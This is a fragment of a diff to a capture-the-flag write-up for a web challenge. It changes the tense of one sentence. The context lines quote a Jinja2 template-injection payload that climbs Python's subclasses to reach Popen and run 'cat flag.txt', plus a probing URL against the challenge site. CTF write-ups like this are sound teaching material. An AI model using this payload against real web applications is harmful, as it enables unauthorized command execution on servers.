OtherAndrew/jellyCTF-writeups/web/bro_visited_his_site_2.md

 > {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,> stdout=-1).communicate()[0].strip()}}
 > ```

 When we visit `https://bro-visited-his-site.jellyc.tf/response?word={{dict.__base__.__subclasses__()`, we are greeted with a massive list of classes.
-The index of Popen here wasn't the same as it was in the HackTricks article above, so I had to look for it myself.
+The index of Popen here isn't the same as it is in the HackTricks article above, so I had to look for it myself.

 After finding Popen's index, I plugged it into the rest of the URL to get the flag: